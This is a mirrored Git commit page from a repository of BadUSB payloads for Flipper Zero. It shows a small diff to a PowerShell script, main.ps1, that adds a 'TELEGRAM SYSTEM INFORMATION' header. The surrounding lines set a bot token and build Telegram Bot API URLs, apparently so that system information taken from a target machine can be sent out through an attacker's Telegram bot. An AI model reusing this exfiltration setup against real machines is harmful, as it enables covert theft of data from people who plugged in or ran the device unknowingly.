mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-28 13:43:39 -08:00
Update main.ps1
This commit is contained in:
@@ -1,4 +1,6 @@
|
||||
$token= "$tg"
|
||||
# TELEGRAM SYSTEM INFORMATION
|
||||
|
||||
$token= "$tg"
|
||||
$apiUrl = "https://api.telegram.org/bot$Token/sendMessage"
|
||||
$URL = 'https://api.telegram.org/bot{0}' -f $Token
|
||||
|
||||
|
||||
Reference in New Issue
Block a user